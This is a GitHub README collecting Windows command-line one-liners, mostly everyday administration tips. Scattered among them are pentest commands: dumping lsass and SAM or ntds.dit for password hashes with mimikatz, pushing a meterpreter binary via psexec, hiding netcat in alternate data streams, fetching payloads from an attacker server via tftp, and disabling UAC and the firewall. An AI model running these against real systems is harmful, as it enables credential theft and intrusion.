Skip to content


Folders and files

Last commit message
Last commit date

Latest commit



35 Commits

Repository files navigation

Windows CLI gems. Tweets of @wincmdfu

Windows one line commands that make life easier, shortcuts and command line fu.

Table of Contents

Get entires from IPv4 neighbor cache

C:\>netsh interface ipv4 show neighbors

Get available wireless networks via cmd and netsh

C:\>netsh wlan show networks mode=b

Quick list IP addresses only

Save the following in ip.bat in %PATH%

C:\>ipconfig | find /I "pv"

Call ip from CLI

List ALL services AND their binaries

for /F "tokens=2* delims= " %i in ('sc query ^| find /I "ce_name"') do @sc qc %i %j

Export SAM from the Windows Registry to a file

C:\>reg save HKLM\SAM "%temp%\SAM.reg"

Enable remote desktop using reg

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Enable the boot log to see list of drivers loaded during startup

bcdedit /set bootlog yes

Read via %windir%\ntbtlog.txt

Powershell cmdlet to create System Restore Point

PS C:\>Checkpoint-Computer -description "Restore point!"

Check the current account for seDebugPrivilege

C:\> whoami /priv | findstr "Debug"

For all privs:

C:\> whoami /priv

Enable/disable system users via command line

C:\>net user test /active:yes (no)

Get full help on the net user command:

C:\>net help user

View process that is consuming the most memory using powershell

PS C:\> (Get-Process | Sort-Object -Descending WS)[0]

Create an Alternate Data Stream from a file on an NTFS partition

C:\>type data.txt > C:\windows\explorer.exe:newads.txt

Export running processes in CSV format

C:\> tasklist /FO CSV > tasks.txt

Lock Windows desktop using command line

C:\> rundll32 user32.dll,LockWorkStation

Start explorer with a file or folder selected/highlighted

C:\> explorer /select,C:\MyData\sample.docx

Dump VirtualBox image containing RAM and ELF headers

C:\>vboxmanage debugvm "WinXPLab1" dumpguestcore --filename winxplab1.elf

Set Time Zone of the system clock

C:\> tzutil /s "Eastern Standard Time"

List available Time zones:

C:\> tzutil /l

Make folder inside a guest from the host


C:\> vboxmanage guestcontrol "WinXP" md "C:\\test" --username "user" --password "pass"

Force copy meterpreter binary to remote machines & run as system

C:\> psexec @$ips.txt -s -u adminuser -p pass -f -c \exploits\mp.exe

Create n/w share called Apps, with read access & limit to 10 conns

C:\> net share Apps=C:\Apps /G:everyone,READ /US:10

List all the drives under My Computer using fsutil

C:\> fsutil.exe fsinfo drives

Troubleshoot n/w packet drops with router statistics using pathping

C:\> pathping -n

List unsigned dlls for a specific process.

For system wide list, remove the process name

C:\> listdlls -u explorer.exe

Obtain a list of Windows XP computers on the domain using PS


PS C:\> Get-ADComputer -filter {OperatingSystem -like "*XP*"}

Open the System Properties window, with the Advanced tab selected

Change the number for different tabs

C:\> control sysdm.cpl,,3

Using the dir command to find Alternate Data Streams

C:\> dir /R | find ":$D"

Using streams sysinternals (shows path):

C:\> streams -s .

Use procdump to obtain the lsass process memory.

Use mimikatz minidump to get passwords

C:\> procdump -accepteula -ma lsass.exe mini.dmp

Run mimikatz in minidump mode & use mini.dmp from procdump

mimikatz # sekurlsa::minidump mini.dmp
mimikatz # sekurlsa::logonPasswords

Get list of startup programs using wmic

C:\> wmic startup list full

Add a binary to an Alternate Data Stream

C:\> type c:\tools\nc.exe > c:\nice.png:nc.exe

Execute it (XP/2K3):

C:\> start c:\nice.png:nc.exe

Execute a binary Alternate Data Stream Win 7/2008 using wmic

C:\> wmic process call create C:\nice.png:nc.exe

Show config & state info for Network Access Protection enabled client

C:\> netsh nap client show configuration

Get computer system information, including domain name and memory, using wmic

C:\> wmic computersystem list /format:csv

Use the Package Manager in Windows to install the Telnet client on Windows Vista & higher

C:\> pkgmgr /iu:"TelnetClient"

Secure delete a file/folder in Windows


C:\> sdelete -p 10 a.txt

To recursively delete folders:

C:\> sdelete -10 -r C:\data\

Show all startup entries while hiding Microsoft entries. CSV output

It covers more locations than Windows inbuilt tools

C:\> autorunsc -m -c

Download files via commandline using PS

PS C:\> ipmo BitsTransfer;Start-BitsTransfer -Source http://foo/nc.exe -Destination C:\Windows\Temp\

Fetch the last 10 entries from the Windows Security event log, in text format

C:\> wevtutil qe Security /c:10 /f:Text

def is XML

Create a dll that runs calc on invoke

msfpayload windows/exec cmd=calc.exe R | msfencode -t dll -o rcalc.dll

C:\> rundll32.exe rcalc.dll,1

Run a command as another user

You will be prompted for password

C:\> runas /noprofile /user:domain\username "mmc wf.msc"

Get shutdown/reboot events from the last 1000 log entries using PS

Get-EventLog -log system -n 1000 | Where {$_.eventid -eq '1074'} | fl -pr *

Create a new snapshot of the volume that has the AD database and log files

C:\> ntdsutil sn "ac i ntds" create quit quit

Mount the snapshot

Copy ntds.dit from snapshot & System hive from reg for pwd hashes

C:\> ntdsutil snapshot "list all" "mount 1" quit quit

Run a process on a remote system using wmic

C:\> wmic /node:ip process call create "net user dum dum /add"

List the machines, with usernames, that were connected via RDP

C:\> reg query "HKCU\Software\Microsoft\Terminal Server Client\Servers" /s

List all process that are running on your system by remote users connected via RDP

C:\> query process *

Reset the Windows TCP\IP stack

netsh int ip reset c:\tcpresetlog.txt

List logged on users.

Very useful during a pentest to look for domain admins

C:\> net session | find "\\"

Set a static IP on a remote box

C:\> wmic /node:remotebox nicconfig where Index=1 call EnableStatic (""), ("")

Bypass powershell execution policy restrictions

PS C:\> powershell -ExecutionPolicy Bypass -Noninteractive -File .\lastboot.ps1

List running processes every second on a remote box

C:\> wmic /node:target process list brief /every:1

Remove /node:target for localhost

Get a list of running processes and their command line arguments on a remote system

C:\> wmic /node:target process get commandline, name

Remotely enable and start the Volume Shadow Copy Service

C:\> sc \\target config vss start= auto
C:\> sc \\target start vss

Ping multiple IPs from ips.txt & see live hosts

C:\>for /F %i in (ips.txt) do ping -n 1 %i | find "bytes="

Set global proxy in Windows to point to IE proxy

C:\> netsh winhttp import proxy source=ie

Enumerate list of drivers with complete path information

C:\> driverquery /FO list /v

View Group Policy Objects that have been applied to a system

Very useful during pentests

C:\> gpresult /z /h outputfile.html

Reset the WMI repository to what it was when the OS was installed

Very helpful if you have a corrupt repo

C:\> winmgmt /resetrepository

Create symbolic links in Windows Vista, 7 & higher

C:\> mklink <link> <target>
C:\> mklink D:\newlink.txt E:\thisexists.txt

Enable the tftp client in Vista & higher

C:\> ocsetup TFTP /quiet

Pull files to a compromised server:

C:\> tftp -i attacksrv get bin.exe

Obtain list of firewall rules on a local system

C:\> netsh advfi fi sh rule name=all

Can be combined with wmic for remote systems

Get name of current domain controller

C:\> set log
C:\> nltest /dcname:DOMAIN

Get list of all DCs:

C:\> nltest /dclist:DOMAIN

Look at content cached in kernel mode on IIS 7 and higher

C:\> netsh http sh ca

Useful when investigating the MS15-034 HTTP.sys vuln

Quick test to check MS15_034

C:\> curl -v -H "Range: bytes=234234-28768768" "http://host/a.png" -o a.png

HTTP 416 = Vulnerable

HTTP 20X = Not vulnerable

Get a list of all open Named pipes via Powershell

PS C:\> [http://System.IO.Directory ]::GetFiles("\\.\\pipe\\")

Possible VENOM detection on VirtualBox

C:\> vboxmanage list -l vms > a.txt

Search 'Storage' & 'Floppy'

List RDP sessions on local or remote in list format

PS C:\> qwinsta /server: | foreach {($_.trim() -replace "\s+",",")} | ConvertFrom-Csv

Get a list of service packs & hotfixes using wmic for remote systems listed in file

C:\> wmic /node:@file /output:out.txt qfe list full

Export wireless connection profiles

C:\> netsh wlan export profile

key=clear allows plain text passwords

Unzip using PowerShell

PS C:\> Add-Type -A System.IO.Compression.FileSystem;[IO.Compression.ZipFile]::ExtractToDirectory(src,dst)

Open the Network & Sharing center

control.exe /name Microsoft.NetworkandSharingCenter

Create a shortcut of this as ns in PATH for ease

Remotely stop/start ftp on several systems

C:\> wmic /node:@ips.txt /user:u /password:p process call create "net <start> msftpsvc"

To quickly find large files using cmd

C:\> forfiles /s /c "cmd /c if @fsize gtr 100000 echo @path @fsize bytes"

Run from the dir you want

Print RDP connections

for /f "delims=" %i in ('reg query "HKCU\Software\Microsoft\Terminal Server Client\Servers"') do reg query "%i"

List scheduled tasks & binaries

C:\> schtasks /query /fo LIST /v

Weak permissions can be exploited for localprivilege escalation

Display the "Stored User names and Passwords" window

C:\> rundll32 keymgr.dll,KRShowKeyMgr

List namespaces & classes in WMI via PowerShell

PS C:\> gwmi -n root -cl __Namespace | Select name

PS C:\> gwmi -n root\cimv2 -li

Convert Between VDI, VMDK, VHD, RAW disk images using VirtualBox

C:\> vboxmanage clonehd myvdi.vdi myvmdk.vmdk --format VMDK

Change file extensions recurseively

csv to xls for eg

C:\Projects> forfiles /S /M *.csv /C "cmd /c ren @file @fname.xls"

List IPs of running VirtualBox machines

for /F %i in ('VBoxManage list runningvms') do VBoxManage guestproperty enumerate %i | find "IP"

Windows Privilege Escalation

Windows Privilege Escalation

Enumerate packages with their oem inf filenames

C:\> pnputil -e

Install a driver package using inf file

C:\> pnputil -i -a path_to_inf

Malware Hunting with Mark Russinovich and the Sysinternals

Malware Hunting with Mark Russinovich and the Sysinternals Tools

Windows Nano Server APIs

Windows wifi hotspot using cmd

Starting a wifi hotspot using Windows cmd with ssid name hotspotname and key password

Windows wifi hotspot using cmd

Disable UAC via cmdline

C:\> reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v EnableLUA /t REG_DWORD /d 0 /f

Turn off Windows firewall for all profiles

Useful if you have a bind shell

C:\> netsh advfirewall set allprofiles state off

List Missing Updates

PS C:\> (New-Object -c Microsoft.Update.Session).CreateUpdateSearcher().Search("IsInstalled=0").Updates|Select Title

Export SAM and SYSTEM Dump password hashes offline

C:\>reg save HKLM\SAM SAM

Convert Binary to base64 string to transfer across restricted RDP

PS C:\> [Convert]::ToBase64String((gc -Pa "a.exe" -En By))

Convert Base64 string to Binary

PS C:\> sc -Path "a.exe" -Val ([Convert]::FromBase64String((gc -Pa "b64.txt" ))) -En By

List services running as SYSTEM and possibly weak file permissions

wmic service where StartName="LocalSystem"|findstr /IV ":\WIN :\PROG"

Check Bitlocker status on a remote box

manage-bde -status -cn <box>

Use wmic /node:@ips.txt & process alias for multiple.

Export failed logon attempts

PS C:\> Get-EventLog -Log Security | ?{$_.EntryType -eq 'FailureAudit'} | epcsv log.csv

Alternate Data Streams and PS

  • List all ADS for all files in current dir
PS C:\> gi * -s *
  • Read ADS
PS C:\> gc <file> -s <ADSName>
  • Create ADS using text input
PS C:\> sc <file> -s <ADSName>
  • Delete ADS
PS C:\> ri <file> -s <ADSName>

Run the Windows Assessment tool for cpu and ram and disk

C:\> winsat cpuformal -v
C:\> winsat memformal -v
C:\> winsat diskformal -v

Port forward (proxy) traffic to remote host and port

C:\> netsh int p add v4tov4 <LPORT> <RHOST> [RPORT] [LHOST]

Enable/Disable NetBIOS over TCP/IP

Step 1. Get Index of Network Adapter:
C:\> wmic nicconfig get caption,index

Step 2. Use the index 
C:\> wmic nicconfig where index=1 call SetTcpipNetbios 1


Compact multiple VDI files across folders

C:\> for /F %i in ('dir /b /s *.vdi ^| find ".vdi"') do vboxmanage modifyhd --compact %i

Full scan using WinDefender

C:\>"%ProgramFiles%\Windows Defender\MpCmdRun.exe" -scan -scantype 2

Use #wmic /node:@ips process for multiple.

Generate 32 char random password

Save as genpass.ps1

PS C:\> ([char[]](38..126)|sort{Get-Random})[0..32] -join ''


Please read the contribution guidelines if you want to contribute.


Windows one line commands that make life easier, shortcuts and command line fu.







No releases published


No packages published